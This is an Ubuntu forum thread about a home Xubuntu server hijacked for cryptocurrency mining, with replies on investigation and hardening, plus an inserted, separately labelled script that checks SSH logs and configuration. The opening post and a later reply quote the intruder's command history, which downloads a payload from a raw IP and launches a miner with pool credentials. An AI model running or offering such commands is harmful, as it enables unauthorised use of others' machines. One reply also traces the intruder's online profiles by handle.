
Thread: Xubuntu 12.04/64, OpenSSH Server Hacked

  1. #1
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Xubuntu 12.04/64, OpenSSH Server Hacked

    Last night I discovered a task on my Xubuntu 12.04/64 server (yes, conky is nice to have): a process "m64.pl" used about 85-100% CPU time. After checking with everyone in my family I see the only option: I have been hacked, possibly through a Windows 7 computer, since port 22 is closed in the DSL router.

    Here is the bash history left by the hacker:

    free -m
    cat /proc/cpuinfo
    uname -a
    ls -l
    cd Public
    wget 79.114.47.143/m64.zip
    unzip m64.zip
    chmod +x *
    ./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
    ps -x
    pgrep minerd
    w
    ifconfig
    sude
    sudo
    sudo useradd ruut
    useradd ruut
    su root useradd
    exit

    To me it seems that someone has started a bitcoin task.

    What I have done is kill the process, remove the files in /Public (had to do it as root as they were locked) and uninstall "OpenSSH Server".

    Any suggestions on how to handle this would be most appreciated.

    Morten (Smiling after all)
    Last edited by mbogevik; February 4th, 2014 at 07:54 PM.

  2. #2
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    It may be that the login is not an SSH login, since both of my users say "Last login: Fri Jan 17 12:06:37 2014" when entering the command "lastlog". Also I have Hamachi online on the computer. Still investigating...

  3. #3
    Join Date
    Jan 2008
    Location
    Bay Area, CA/Kanagawa, JP
    Beans
    248
    Distro
    Xubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

    i'd wipe and reinstall the system if i were you..

  4. #4
    Join Date
    Jun 2007
    Location
    Porirua, New Zealand
    Beans
    Hidden!
    Distro
    Ubuntu

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Thread moved to Security Discussions.
    Forum DOs and DON'Ts
    Never assume that information you find using a search engine is up-to-date.

  5. #5
    Join Date
    Jan 2009
    Beans
    Hidden!
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by brokenhachi
    lol... don't open your ssh server with PW auth to the wild world of the internet? You can see the ssh login attempts at /var/log/auth.log

    i'd wipe and reinstall the system if i were you..

    +1 on wiping and reinstalling.

    Also, in the future be sure to disable password authentication in /etc/ssh/sshd_config.

    This is a great tutorial on how to set up key-based authentication with your ssh server.

  6. #6
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by mbogevik
    free -m
    cat /proc/cpuinfo
    uname -a
    ls -l
    cd Public
    wget 79.114.47.143/m64.zip
    unzip m64.zip
    chmod +x *
    ./m64.pl -o stratum+tcp://linuxpower.cf:3333 -u sebywarlord.1 -p miningltcs -B
    ps -x
    pgrep minerd
    w
    ifconfig
    sude
    sudo
    sudo useradd ruut
    useradd ruut
    su root useradd
    exit

    If this was a hacker, they should have known what system they were accessing via uname -a, so they wouldn't have tried to run su root, because the root user is locked in a default install of Ubuntu.

    Do you have any other services running on this box? Just because ssh is not open to the internet does not mean another server isn't open to the internet.
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...

  7. #7
    Join Date
    Nov 2013
    Beans
    368

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by CharlesA
    If this was a hacker, they should have known what system they were accessing via uname -a, so they wouldn't have tried to run su root, because the root user is locked in a default install of Ubuntu.

    Perhaps he's still in training camp?

    +1 to the recommendation to reinstall, then make sure you properly secure any internet-facing services. I would also be highly suspicious of all the other computers on this network. I would reimage them all.

    There are some fun facts to pull out of your bash history. The IP comes back to Romania. The name "sebywarlord" turns up some interesting online profiles:

    1. Seems to be a Romanian fellow just looking for love http://www.lets101.com/sebywarlord/profile

    2. He might be a gamer, there are a bunch of gamer forum profiles.

    3. Stack Exchange account with that name posted a pic of himself
    http://stackoverflow.com/users/3076388/sebywarlord

    4. Sebywarlord is a member of 2 illegal-looking forums where he posted the outcome of what looks like a brute forcing script.
    I've been using vi for years, mostly because I can't figure out how to exit.

  8. #8
    Join Date
    Oct 2009
    Beans
    Hidden!
    Distro
    Ubuntu 12.04 Precise Pangolin

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Quote Originally Posted by bashiergui
    Perhaps he's still in training camp?

    +1 to the recommendation to reinstall, then make sure you properly secure any internet-facing services. I would also be highly suspicious of all the other computers on this network. I would reimage them all.

    +1 to that. I would check /var/log/auth.log for any unusual entries and also check to see which processes are listening on that box before wiping it (take it off the network at least).

    Code:
    sudo netstat -nlp
    Come to #ubuntuforums! We have cookies! | Basic Ubuntu Security Guide

    Tomorrow's an illusion and yesterday's a dream, today is a solution...
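    As an added example (not code from the thread or from any of the posters), a POSIX shell script that carries out the checks recommended in this thread over constructed data: it tallies sshd "Failed password" attempts per source IP from auth.log-style lines, lists which password logins were accepted, and tests whether an sshd_config still permits password authentication (the setting post #5 advises turning off). The log lines, host name, user names, IPs and config fragments are all constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): tally sshd "Failed password" attempts per
# source IP from auth.log-style lines, list the accepted password logins, and
# check whether an sshd_config still permits password authentication.

# Constructed auth.log lines in the syslog format sshd used on Ubuntu 12.04;
# host name, user names and IPs are made up for illustration.
SAMPLE_AUTH_LOG='Feb  4 03:12:01 xubuntu sshd[2211]: Failed password for invalid user admin from 198.51.100.23 port 41022 ssh2
Feb  4 03:12:05 xubuntu sshd[2213]: Failed password for root from 198.51.100.23 port 41030 ssh2
Feb  4 03:12:09 xubuntu sshd[2215]: Failed password for invalid user test from 203.0.113.7 port 50210 ssh2
Feb  4 03:12:14 xubuntu sshd[2217]: Accepted password for morten from 198.51.100.23 port 41044 ssh2
Feb  4 03:13:00 xubuntu sshd[2219]: Failed password for invalid user oracle from 198.51.100.23 port 41050 ssh2'

# Read log lines on stdin; print "<count> <ip>" per source IP, busiest first.
failed_logins_by_ip() {
    grep 'sshd\[[0-9]*\]: Failed password for ' |
        sed -n 's/.* from \([0-9.]*\) port .*/\1/p' |
        sort | uniq -c | sort -rn | awk '{print $1, $2}'
}

# Read log lines on stdin; print "<user> <ip>" for each accepted password login.
# A success from an IP that was also guessing passwords is the line to worry about.
accepted_password_logins() {
    sed -n 's/.*sshd\[[0-9]*\]: Accepted password for \([^ ]*\) from \([0-9.]*\) port .*/\1 \2/p'
}

# Exit 0 if the sshd_config at $1 still allows password logins. sshd uses the
# first occurrence of a keyword, and the OpenSSH default is "yes" when the
# keyword is missing or commented out (Match blocks are not handled here).
sshd_password_auth_enabled() {
    value=$(grep -i '^[[:space:]]*PasswordAuthentication[[:space:]]' "$1" |
        head -n1 | awk '{print tolower($2)}')
    if [ -z "$value" ] || [ "$value" = "yes" ]; then return 0; else return 1; fi
}

# Constructed sshd_config fragments: the stock file leaves the keyword commented
# out (default "yes" applies); the hardened one turns it off and blocks root.
WEAK_CFG=$(mktemp); printf '#PasswordAuthentication yes\nPubkeyAuthentication yes\n' > "$WEAK_CFG"
HARD_CFG=$(mktemp); printf 'PasswordAuthentication no\nPubkeyAuthentication yes\nPermitRootLogin no\n' > "$HARD_CFG"

echo "failed password attempts per IP:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | failed_logins_by_ip
echo "accepted password logins:"
printf '%s\n' "$SAMPLE_AUTH_LOG" | accepted_password_logins
sshd_password_auth_enabled "$WEAK_CFG" && echo "stock config: password authentication still enabled"
sshd_password_auth_enabled "$HARD_CFG" || echo "hardened config: password authentication disabled"
rm -f "$WEAK_CFG" "$HARD_CFG"
```

    On a real box, feed the functions with `cat /var/log/auth.log*` and point the config check at /etc/ssh/sshd_config; read the output alongside `sudo netstat -nlp` from the post above, since a listening service you did not expect is the other half of the picture.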

  9. #9
    Join Date
    Sep 2009
    Location
    Norway
    Beans
    46
    Distro
    Ubuntu 13.10 Saucy Salamander

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    Yes, large number of login attempts in /var/log/auth.log...

    But the thing is I do not have port 22 open on the router (DSL); only the Teamspeak 3 server and my kids' Minecraft server are open to the world.

    I think that I first need to find out how this person got access; a wipe and reinstall may not help if it is through a Windows 7 computer or any other "box" on my LAN, like the Xbox 360, Raspberry Pi, VU++ satellite tuner, Popcorn media player or even the Synology DS213j NAS. But in the end I think the six computers with Windows 7 are the largest gift to a hacker.

    I'll check the netstat command when back from work.
    Last edited by mbogevik; February 5th, 2014 at 12:23 PM.

  10. #10
    Join Date
    Nov 2013
    Beans
    368

    Re: Xubuntu 12.04/64, OpenSSH Server Hacked

    This guy (the hacker) isn't the sharpest knife in the drawer. Check logs on your minecraft & teamspeak servers for connections to the same IP.

    It doesn't really matter how he got in. You could spend a ton of money and time trying to find out. I recommend you focus on inspecting each box the best you can for any evidence of intrusion. Then reimage the ones that are affected. Then figure out how to secure the network.

    This of course assumes you have backups... If you don't, then unplug the network from the Internet and go buy yourself an external drive to copy all your data to.
    Last edited by bashiergui; February 5th, 2014 at 04:07 PM.
    I've been using vi for years, mostly because I can't figure out how to exit.
